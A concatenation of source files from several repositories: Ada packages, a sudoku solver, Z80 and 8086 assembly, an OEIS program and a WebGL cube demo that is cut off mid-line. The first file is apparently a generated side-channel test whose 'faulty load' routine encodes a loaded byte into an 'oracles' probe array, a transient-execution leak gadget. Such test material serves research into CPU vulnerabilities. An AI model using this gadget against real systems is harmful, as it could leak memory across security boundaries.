<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r10 push %r13 push %r14 push %r8 push %r9 push %rcx push %rdi push %rsi lea addresses_WC_ht+0x1eeed, %rsi lea addresses_WC_ht+0x1cdbd, %rdi nop nop nop nop nop dec %r10 mov $21, %rcx rep movsl nop nop dec %r8 lea addresses_D_ht+0xf731, %r9 nop nop nop nop nop sub %r13, %r13 mov (%r9), %r8w nop nop and %r13, %r13 lea addresses_WC_ht+0x12a6d, %rsi lea addresses_D_ht+0xd7ad, %rdi mfence mov $109, %rcx rep movsl nop nop nop nop add $44186, %r13 lea addresses_D_ht+0x326d, %rsi nop nop nop and $50574, %r14 mov $0x6162636465666768, %r9 movq %r9, (%rsi) nop nop nop xor %r10, %r10 lea addresses_A_ht+0x1556d, %r8 clflush (%r8) nop nop nop nop nop cmp $4168, %rsi vmovups (%r8), %ymm2 vextracti128 $1, %ymm2, %xmm2 vpextrq $1, %xmm2, %rdi nop xor %r8, %r8 lea addresses_D_ht+0x5b6d, %r9 inc %rcx movb $0x61, (%r9) nop nop and $27590, %r13 lea addresses_WC_ht+0x1ee2d, %rsi lea addresses_WT_ht+0x916d, %rdi nop nop nop nop xor %r13, %r13 mov $52, %rcx rep movsb nop nop and $12521, %rcx lea addresses_UC_ht+0x128e5, %r13 nop nop nop nop dec %r10 mov (%r13), %r9d nop nop nop nop sub $46846, %r14 lea addresses_A_ht+0xfd0f, %rsi lea addresses_UC_ht+0x1626d, %rdi clflush (%rdi) sub $62278, %r10 mov $124, %rcx rep movsq cmp %r8, %r8 lea addresses_A_ht+0xbf01, %rsi lea addresses_WT_ht+0xf75f, %rdi nop nop cmp %r13, %r13 mov $65, %rcx rep movsw add %r8, %r8 pop %rsi pop %rdi pop %rcx pop %r9 pop %r8 pop %r14 pop %r13 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r11 push %r12 push %r14 push %rax push %rbx push %rdx // Load lea addresses_UC+0x2a28, %r12 add %r11, %r11 movups (%r12), %xmm1 vpextrq $1, %xmm1, %r10 nop inc %r11 // Store lea addresses_PSE+0x1df6d, %r14 clflush (%r14) nop nop dec %rdx movw $0x5152, (%r14) nop nop nop nop add $62969, %r12 // Faulty Load lea addresses_PSE+0x1df6d, %rbx nop nop nop nop nop cmp $3909, %r11 mov (%rbx), %r12w lea oracles, %r10 and $0xff, %r12 shlq $12, %r12 mov (%r10,%r12,1), %r12 pop %rdx pop %rbx pop %rax pop %r14 pop %r12 pop %r11 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_PSE', 'same': False, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'} {'src': {'type': 'addresses_UC', 'same': False, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_PSE', 'same': True, 'size': 2, 'congruent': 0, 'NT': True, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_PSE', 'same': True, 'size': 2, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_WC_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_D_ht', 'same': False, 'size': 2, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 6, 'same': False}, 'OP': 'REPM'} {'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 8, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_A_ht', 'same': False, 'size': 32, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 1, 'congruent': 10, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_WC_ht', 'congruent': 6, 'same': True}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 3, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 4, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_A_ht', 'congruent': 1, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 6, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_A_ht', 'congruent': 2, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 1, 'same': True}, 'OP': 'REPM'} {'52': 21829} 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 */
src/sockets-os_constants.ads
glencornell/ada-socketcan
2
24948
-- MIT License -- -- Copyright (c) 2021 <NAME> <<EMAIL>> -- -- Permission is hereby granted, free of charge, to any person obtaining a copy -- of this software and associated documentation files (the "Software"), to deal -- in the Software without restriction, including without limitation the rights -- to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -- copies of the Software, and to permit persons to whom the Software is -- furnished to do so, subject to the following conditions: -- -- The above copyright notice and this permission notice shall be included in all -- copies or substantial portions of the Software. -- -- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -- IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -- FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -- AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -- LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -- OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -- SOFTWARE. -- To be merged with gnat.sockets.os_constants... -- from /usr/inlude/linux/can.h -- from /usr/inlude/linux/can/raw.h -- from /usr/inlude/bits/socket_type.h package Sockets.Os_Constants is pragma Pure; -- special address description flags for the CAN_ID CAN_EFF_FLAG : constant := 16#80000000#; -- EFF/SFF is set in the MSB CAN_RTR_FLAG : constant := 16#40000000#; -- remote transmission request CAN_ERR_FLAG : constant := 16#20000000#; -- error message frame -- valid bits in CAN ID for frame formats CAN_SFF_MASK : constant := 16#000007FF#; -- standard frame format (SFF) CAN_EFF_MASK : constant := 16#1FFFFFFF#; -- extended frame format (EFF) CAN_ERR_MASK : constant := 16#1FFFFFFF#; -- omit EFF, RTR, ERR flags CAN_INV_FILTER : constant := 16#20000000#; -- to be set in can_filter.can_id CAN_RAW_FILTER_MAX : constant := 512; -- maximum number of can_filter set via setsockopt() ----------------------- -- protocol families -- ----------------------- SOCK_RAW : constant := 3; -- Raw protocol interface. -- particular protocols of the protocol family PF_CAN CAN_RAW : constant := 1; -- RAW sockets CAN_BCM : constant := 2; -- Broadcast Manager CAN_TP16 : constant := 3; -- VAG Transport Protocol v1.6 CAN_TP20 : constant := 4; -- VAG Transport Protocol v2.0 CAN_MCNET : constant := 5; -- Bosch MCNet CAN_ISOTP : constant := 6; -- ISO 15765-2 Transport Protocol CAN_NPROTO : constant := 7; -- Protocol families. PF_CAN : constant := 29; -- Controller Area Network. -- Address families. AF_CAN : constant := PF_CAN; -------------------- -- Socket options -- -------------------- SOL_CAN_BASE : constant := 100; SOL_CAN_RAW : constant := SOL_CAN_BASE + CAN_RAW; CAN_RAW_FILTER : constant := 1; -- set 0 .. n can_filter(s) CAN_RAW_ERR_FILTER : constant := 2; -- set filter for error frames CAN_RAW_LOOPBACK : constant := 3; -- local loopback (default:on) CAN_RAW_RECV_OWN_MSGS : constant := 4; -- receive my own msgs (default:off) CAN_RAW_FD_FRAMES : constant := 5; -- allow CAN FD frames (default:off) CAN_RAW_JOIN_FILTERS : constant := 6; -- all filters must match to trigger end Sockets.Os_Constants;
problems/096/a096.adb
melwyncarlo/ProjectEuler
0
16207
<gh_stars>0 with Ada.Text_IO; with Ada.Integer_Text_IO; with Ada.Characters.Handling; -- Copyright 2021 <NAME> procedure A096 is use Ada.Text_IO; use Ada.Integer_Text_IO; use Ada.Characters.Handling; File_Name : constant String := "problems/096/p096_sudoku.txt"; Last_Index : Natural; Num_Str : String (1 .. 10); FT : File_Type; Sum : Integer := 0; Index : Integer := 0; Sub_Index : Integer := 1; I, I2, J, J2 : Integer; Duplicate_Found : Boolean; Is_Fixed_Cell : array (Integer range 1 .. 9, Integer range 1 .. 9) of Boolean; Digit : array (Integer range 1 .. 9, Integer range 1 .. 9, Integer range 1 .. 9) of Boolean; Sudoku : array (Integer range 1 .. 50, Integer range 1 .. 9, Integer range 1 .. 9) of Integer; begin Open (FT, In_File, File_Name); while not End_Of_File (FT) loop Get_Line (FT, Num_Str, Last_Index); if not Is_Digit (Num_Str (1)) then Sub_Index := 1; Index := Index + 1; goto Next_Line; end if; for K in 1 .. 9 loop Sudoku (Index, Sub_Index, K) := Character'Pos (Num_Str (K)) - Character'Pos ('0'); end loop; Sub_Index := Sub_Index + 1; <<Next_Line>> end loop; Close (FT); for Puzzle in 1 .. 50 loop Is_Fixed_Cell := (others => (others => False)); for I in 1 .. 9 loop for J in 1 .. 9 loop if Sudoku (Puzzle, I, J) /= 0 then Is_Fixed_Cell (I, J) := True; end if; end loop; end loop; Digit := (others => (others => (others => False))); I := 1; while I <= 9 loop J := 1; while J <= 9 loop if Is_Fixed_Cell (I, J) then J := J + 1; goto Continue; end if; I2 := (Integer ((I - 1) / 3) * 3) + 1; J2 := (Integer ((J - 1) / 3) * 3) + 1; Duplicate_Found := True; if not Digit (I, J, 1) or not Digit (I, J, 2) or not Digit (I, J, 3) or not Digit (I, J, 4) or not Digit (I, J, 5) or not Digit (I, J, 6) or not Digit (I, J, 7) or not Digit (I, J, 8) or not Digit (I, J, 9) then for K in 1 .. 9 loop if Digit (I, J, K) then goto Sub_Continue; end if; Duplicate_Found := False; for L in 1 .. 9 loop if L /= I then if Sudoku (Puzzle, L, J) = K then Duplicate_Found := True; exit; end if; end if; if L /= J then if Sudoku (Puzzle, I, L) = K then Duplicate_Found := True; exit; end if; end if; end loop; if not Duplicate_Found then if Sudoku (Puzzle, I2, J2) = K or Sudoku (Puzzle, I2, J2 + 1) = K or Sudoku (Puzzle, I2, J2 + 2) = K or Sudoku (Puzzle, I2 + 1, J2) = K or Sudoku (Puzzle, I2 + 1, J2 + 1) = K or Sudoku (Puzzle, I2 + 1, J2 + 2) = K or Sudoku (Puzzle, I2 + 2, J2) = K or Sudoku (Puzzle, I2 + 2, J2 + 1) = K or Sudoku (Puzzle, I2 + 2, J2 + 2) = K then Duplicate_Found := True; end if; end if; if not Duplicate_Found then Digit (I, J, K) := True; Sudoku (Puzzle, I, J) := K; exit; end if; <<Sub_Continue>> end loop; end if; if Duplicate_Found then for K in 1 .. 9 loop Digit (I, J, K) := False; end loop; Sudoku (Puzzle, I, J) := 0; J := J - 1; if J = 0 then J := 9; I := I - 1; end if; while Is_Fixed_Cell (I, J) loop J := J - 1; if J = 0 then J := 9; I := I - 1; end if; end loop; else J := J + 1; end if; <<Continue>> end loop; I := I + 1; end loop; Sum := Sum + (Sudoku (Puzzle, 1, 1) * 100) + (Sudoku (Puzzle, 1, 2) * 10) + Sudoku (Puzzle, 1, 3); end loop; Put (Sum, Width => 0); end A096;
tools/aflex/src/external_file_manager.ads
svn2github/matreshka
24
5564
<filename>tools/aflex/src/external_file_manager.ads -- Copyright (c) 1990 Regents of the University of California. -- All rights reserved. -- -- This software was developed by <NAME> of the Arcadia project -- at the University of California, Irvine. -- -- Redistribution and use in source and binary forms are permitted -- provided that the above copyright notice and this paragraph are -- duplicated in all such forms and that any documentation, -- advertising materials, and other materials related to such -- distribution and use acknowledge that the software was developed -- by the University of California, Irvine. The name of the -- University may not be used to endorse or promote products derived -- from this software without specific prior written permission. -- THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR -- IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED -- WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. -- TITLE external_file_manager -- AUTHOR: <NAME> (UCI) -- DESCRIPTION opens external files for other functions -- NOTES This package opens external files, and thus may be system dependent -- because of limitations on file names. -- This version is for the VADS 5.5 Ada development system. -- $Header: /co/ua/self/arcadia/aflex/ada/src/RCS/file_managerS.a,v 1.4 90/01/12 15:20:00 self Exp Locker: self $ with Ada.Wide_Wide_Text_IO; package External_File_Manager is procedure Get_IO_Spec_File (File : in out Ada.Wide_Wide_Text_IO.File_Type); procedure Get_IO_Body_File (File : in out Ada.Wide_Wide_Text_IO.File_Type); procedure Get_DFA_Spec_File (File : in out Ada.Wide_Wide_Text_IO.File_Type); procedure Get_DFA_Body_File (File : in out Ada.Wide_Wide_Text_IO.File_Type); procedure Get_Scanner_Spec_File (File : in out Ada.Wide_Wide_Text_IO.File_Type); procedure Get_Scanner_Body_File (File : in out Ada.Wide_Wide_Text_IO.File_Type); procedure Get_Backtrack_File (File : in out Ada.Wide_Wide_Text_IO.File_Type); procedure INITIALIZE_FILES; end External_File_Manager;
libsrc/gfx/narrow/drawto_callee.asm
ahjelm/z88dk
640
244500
<reponame>ahjelm/z88dk ; ----- void __CALLEE__ drawto(int x2, int y2) IF !__CPU_INTEL__ & !__CPU_GBZ80__ SECTION code_graphics PUBLIC drawto_callee PUBLIC _drawto_callee PUBLIC asm_drawto EXTERN swapgfxbk EXTERN __graphics_end EXTERN Line EXTERN plotpixel EXTERN __gfx_coords INCLUDE "graphics/grafix.inc" .drawto_callee ._drawto_callee pop af ; ret addr pop de ; y2 pop hl ld d,l ; x2 push af ; ret addr .asm_drawto ld hl,(__gfx_coords) push ix IF NEED_swapgfxbk = 1 call swapgfxbk ENDIF push hl push de call plotpixel pop de pop hl ld ix,plotpixel call Line IF NEED_swapgfxbk jp __graphics_end ELSE IF !__CPU_INTEL__ & !__CPU_GBZ80__ pop ix ENDIF ret ENDIF ENDIF
ex5.asm
MengmSun/80x86AssemblyExperiments
2
92407
<filename>ex5.asm data segment ;numerr db 'no operand for operator',0dh,0ah,'$' ;synerr db 'unmatched parenthese',0dh,0ah,'$' ;oprerr db 'wrong operator',0dh,0ah,'$' unknownerr db 'unknown input',0dh,0ah,'$' buffer db 1024 dup(?) data ends stack segment para stack 'stack' dw 64 dup(0) stack ends code segment assume cs:code,ss:stack,ds:data main proc far start: mov ax,data mov ds,ax xor si,si xor ax,ax call readExpr dec si xor bx,bx xor cx,cx call calStk ;pop ax xor di,di tranto10: mov dx,0 mov bx,10 inc di div bx;(dx)(ax)/10 push dx;dx为模,ax为商 mov dx,0 cmp ax,0 jz print jmp tranto10 print: ;cmp di,0 ;jz printloop pop ax mov dl,al add dl,48 mov ah,02h int 21h dec di cmp di,0 jne print jmp quit main endp calStk proc push bx push cx cmp buffer[si],'-' je eval cmp buffer[si],'+' je eval xor ah,ah mov al,buffer[si] dec si jmp calquit eval: mov cl,buffer[si] dec si call calStk mov bx,ax call calStk cmp cl,'+' je plus sub ax,bx jmp calquit plus: add ax,bx calquit: pop cx pop bx ;push ax ret calStk endp readExpr proc push bx push dx xor bx,bx xor dx,dx read: call getChar compare: cmp al,13 je check cmp al,')' je check cmp al,'(' je newExpr cmp al,'+' je opr cmp al,'-' je opr cmp al,'0' jl unknown cmp al,'9' jg unknown sub al,'0' jmp readNum readNum: mov cl,al mov al,bl xor ah,ah mov ch,10 mul ch mov bl,al add bl,cl mov dl,1 call getChar jmp compare opr: test dl,dl jz noNum xor dl,dl mov buffer[si],bl inc si xor bl,bl noNum: test bh,bh jz noOpr mov buffer[si],bh inc si noOpr: mov bh,al jmp read newExpr: call readExpr cmp al,')' jne synErr test bh,bh jz read mov buffer[si],bh inc si xor bx,bx jmp read numErr: jmp quit synErr: jmp quit oprErr: jmp quit unknown: push dx push ax lea dx,unknownerr mov ah,09h int 21h pop ax pop dx jmp quit check: test dl,dl jz finish mov buffer[si],bl inc si test bh,bh jz finish mov buffer[si],bh inc si finish: pop dx pop bx ret readExpr endp getChar proc mov ah,1 int 21h ret getChar endp quit: mov ah,4ch int 21h ret code ends end start
programs/oeis/227/A227108.asm
neoneye/loda
22
18990
; A227108: Denominators of harmonic mean H(n,5), n >= 0. ; 1,3,7,4,9,1,11,6,13,7,3,8,17,9,19,2,21,11,23,12,1,13,27,14,29,3,31,16,33,17,7,18,37,19,39,4,41,21,43,22,9,23,47,24,49,1,51,26,53,27,11,28,57,29,59,6,61,31,63,32,13,33,67,34,69,7,71,36,73,37,3,38,77 add $0,5 lpb $0 dif $0,5 lpe dif $0,2
src/util-serialize-contexts.ads
Letractively/ada-util
60
17882
<filename>src/util-serialize-contexts.ads ----------------------------------------------------------------------- -- util-serialize-contexts -- Contexts for serialization framework -- Copyright (C) 2010, 2011 <NAME> -- Written by <NAME> (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- with Ada.Containers; with Ada.Containers.Hashed_Maps; with Ada.Finalization; package Util.Serialize.Contexts is No_Data : exception; -- ------------------------------ -- Context data key -- ------------------------------ type Data_Key is private; -- Allocate a unique data key for a mapper. procedure Allocate (Key : out Data_Key); -- ------------------------------ -- Data context for the mapper -- ------------------------------ type Data is tagged limited private; type Data_Access is access all Data'Class; -- Finalize the data object when it is removed from the reader context. procedure Finalize (Object : in out Data) is null; -- ------------------------------ -- Reader context -- ------------------------------ type Context is new Ada.Finalization.Limited_Controlled with private; -- Get the data object associated with the given key. -- Raises No_Data exception if there is no data object. function Get_Data (Ctx : in Context; Key : in Data_Key) return Data_Access; -- Set the data object associated with the given key. -- Free the previous data object if there was one. -- The data object will be freed if the context is destroyed. procedure Set_Data (Ctx : in out Context; Key : in Data_Key; Content : in Data_Access); private type Data_Key is new Integer; function Hash (Key : in Data_Key) return Ada.Containers.Hash_Type; type Data is tagged limited null record; package Data_Map is new Ada.Containers.Hashed_Maps (Key_Type => Data_Key, Element_Type => Data_Access, Hash => Hash, Equivalent_Keys => "="); type Context is new Ada.Finalization.Limited_Controlled with record Data : Data_Map.Map; end record; -- Free the context data. overriding procedure Finalize (Ctx : in out Context); end Util.Serialize.Contexts;
examples/gl_cube/cube_demo.adb
godunko/adawebui
2
28196
<filename>examples/gl_cube/cube_demo.adb with Ada.Numerics.Generic_Elementary_Functions; -- with System.IO; with Web.HTML.Canvases; with Web.Strings; with Web.UI.Events.Mouse.Click; with Web.UI.GL_Widgets; with Web.Window; with OpenGL; with Cube_Programs; package body Cube_Demo is use type OpenGL.GLfloat; function "+" (Item : Wide_Wide_String) return Web.Strings.Web_String renames Web.Strings.To_Web_String; package GLfloat_Elementary_Functions is new Ada.Numerics.Generic_Elementary_Functions (OpenGL.GLfloat); procedure Initialize_Demo; type My_GL_Widget is new Web.UI.GL_Widgets.Abstract_GL_Widget with record Vertex_Buffer : Cube_Programs.Vertex_Data_Buffers.OpenGL_Buffer (OpenGL.Vertex); Index_Buffer : Cube_Programs.Index_Data_Buffers.OpenGL_Buffer (OpenGL.Index); Program : Cube_Programs.Cube_Program; end record; type My_GL_Widget_Access is access all My_GL_Widget'Class; overriding procedure Initialize_GL (Self : in out My_GL_Widget); overriding procedure Paint_GL (Self : in out My_GL_Widget); overriding procedure Resize_GL (Self : in out My_GL_Widget; Width : Integer; Height : Integer); overriding procedure Context_Lost (Self : in out My_GL_Widget); -- overriding procedure Click_Event -- (Self : in out My_GL_Widget; -- Event : in out Web.UI.Events.Mouse.Click.Click_Event'Class); procedure Initialize (Self : in out My_GL_Widget'Class); Points : constant Cube_Programs.Vertex_Data_Array := ((Vertex_Position => (-1.0, -1.0, -1.0), Vertex_Color => (5.0, 3.0, 7.0)), (Vertex_Position => ( 1.0, -1.0, -1.0), Vertex_Color => (5.0, 3.0, 7.0)), (Vertex_Position => ( 1.0, 1.0, -1.0), Vertex_Color => (5.0, 3.0, 7.0)), (Vertex_Position => (-1.0, 1.0, -1.0), Vertex_Color => (5.0, 3.0, 7.0)), (Vertex_Position => (-1.0, -1.0, 1.0), Vertex_Color => (1.0, 1.0, 3.0)), (Vertex_Position => ( 1.0, -1.0, 1.0), Vertex_Color => (1.0, 1.0, 3.0)), (Vertex_Position => ( 1.0, 1.0, 1.0), Vertex_Color => (1.0, 1.0, 3.0)), (Vertex_Position => (-1.0, 1.0, 1.0), Vertex_Color => (1.0, 1.0, 3.0)), (Vertex_Position => (-1.0, -1.0, -1.0), Vertex_Color => (0.0, 0.0, 1.0)), (Vertex_Position => (-1.0, 1.0, -1.0), Vertex_Color => (0.0, 0.0, 1.0)), (Vertex_Position => (-1.0, 1.0, 1.0), Vertex_Color => (0.0, 0.0, 1.0)), (Vertex_Position => (-1.0, -1.0, 1.0), Vertex_Color => (0.0, 0.0, 1.0)), (Vertex_Position => ( 1.0, -1.0, -1.0), Vertex_Color => (1.0, 0.0, 0.0)), (Vertex_Position => ( 1.0, 1.0, -1.0), Vertex_Color => (1.0, 0.0, 0.0)), (Vertex_Position => ( 1.0, 1.0, 1.0), Vertex_Color => (1.0, 0.0, 0.0)), (Vertex_Position => ( 1.0, -1.0, 1.0), Vertex_Color => (1.0, 0.0, 0.0)), (Vertex_Position => (-1.0, -1.0, -1.0), Vertex_Color => (1.0, 1.0, 0.0)), (Vertex_Position => (-1.0, -1.0, 1.0), Vertex_Color => (1.0, 1.0, 0.0)), (Vertex_Position => ( 1.0, -1.0, 1.0), Vertex_Color => (1.0, 1.0, 0.0)), (Vertex_Position => ( 1.0, -1.0, -1.0), Vertex_Color => (1.0, 1.0, 0.0)), (Vertex_Position => (-1.0, 1.0, -1.0), Vertex_Color => (0.0, 1.0, 0.0)), (Vertex_Position => (-1.0, 1.0, 1.0), Vertex_Color => (0.0, 1.0, 0.0)), (Vertex_Position => ( 1.0, 1.0, 1.0), Vertex_Color => (0.0, 1.0, 0.0)), (Vertex_Position => ( 1.0, 1.0, -1.0), Vertex_Color => (0.0, 1.0, 0.0))); Indicies : constant Cube_Programs.Index_Data_Array := ( 0, 1, 2, 0, 2, 3, 4, 5, 6, 4, 6, 7, 8, 9, 10, 8, 10, 11, 12, 13, 14, 12, 14, 15, 16, 17, 18, 16, 18, 19, 20, 21, 22, 20, 22, 23); function Projection (Angle : OpenGL.GLfloat; Aspect : OpenGL.GLfloat; Z_Min : OpenGL.GLfloat; Z_Max : OpenGL.GLfloat) return OpenGL.GLfloat_Matrix_4x4; ---------------- -- Projection -- ---------------- function Projection (Angle : OpenGL.GLfloat; Aspect : OpenGL.GLfloat; Z_Min : OpenGL.GLfloat; Z_Max : OpenGL.GLfloat) return OpenGL.GLfloat_Matrix_4x4 is Ang : constant OpenGL.GLfloat := GLfloat_Elementary_Functions.Tan ((Angle * 0.5) * Ada.Numerics.PI / 180.0); begin return ((0.5 / Ang, 0.0, 0.0, 0.0), (0.0, 0.5 * Aspect / Ang, 0.0, 0.0), (0.0, 0.0, -(Z_Max + Z_Min) / (Z_Max - Z_Min), (-2.0 * Z_Max * Z_Min) / (Z_Max - Z_Min)), (0.0, 0.0, -1.0, 0.0)); end Projection; procedure Rotate_X (M : in out OpenGL.GLfloat_Matrix_4x4; Angle : OpenGL.GLfloat); procedure Rotate_Y (M : in out OpenGL.GLfloat_Matrix_4x4; Angle : OpenGL.GLfloat); procedure Rotate_Z (M : in out OpenGL.GLfloat_Matrix_4x4; Angle : OpenGL.GLfloat); -------------- -- Rotate_X -- -------------- procedure Rotate_X (M : in out OpenGL.GLfloat_Matrix_4x4; Angle : OpenGL.GLfloat) is -- 0 4 8 12 -- 1 5 9 13 -- 2 6 10 14 -- 3 7 11 15 C : constant OpenGL.GLfloat := GLfloat_Elementary_Functions.Cos (Angle); S : constant OpenGL.GLfloat := GLfloat_Elementary_Functions.Sin (Angle); M21 : constant OpenGL.GLfloat := M (2, 1); M22 : constant OpenGL.GLfloat := M (2, 2); M23 : constant OpenGL.GLfloat := M (2, 3); -- var mv1 = m[1], mv5 = m[5], mv9 = m[9]; begin M (2, 1) := C * M (2, 1) - S * M (3, 1); -- m[1] = m[1]*c-m[2]*s; M (2, 2) := C * M (2, 2) - S * M (3, 2); -- m[5] = m[5]*c-m[6]*s; M (2, 3) := C * M (2, 3) - S * M (3, 3); -- m[9] = m[9]*c-m[10]*s; M (3, 1) := C * M (3, 1) + S * M21; -- m[2] = m[2]*c+mv1*s; M (3, 2) := C * M (3, 2) + S * M22; -- m[6] = m[6]*c+mv5*s; M (3, 3) := C * M (3, 3) + S * M23; -- m[10] = m[10]*c+mv9*s; end Rotate_X; -------------- -- Rotate_Y -- -------------- procedure Rotate_Y (M : in out OpenGL.GLfloat_Matrix_4x4; Angle : OpenGL.GLfloat) is -- 0 4 8 12 -- 1 5 9 13 -- 2 6 10 14 -- 3 7 11 15 C : constant OpenGL.GLfloat := GLfloat_Elementary_Functions.Cos (Angle); S : constant OpenGL.GLfloat := GLfloat_Elementary_Functions.Sin (Angle); M11 : constant OpenGL.GLfloat := M (1, 1); M12 : constant OpenGL.GLfloat := M (1, 2); M13 : constant OpenGL.GLfloat := M (1, 3); -- var mv0 = m[0], mv4 = m[4], mv8 = m[8]; begin M (1, 1) := C * M (1, 1) + S * M (3, 1); -- m[0] = c*m[0]+s*m[2]; M (1, 2) := C * M (1, 2) + S * M (3, 2); -- m[4] = c*m[4]+s*m[6]; M 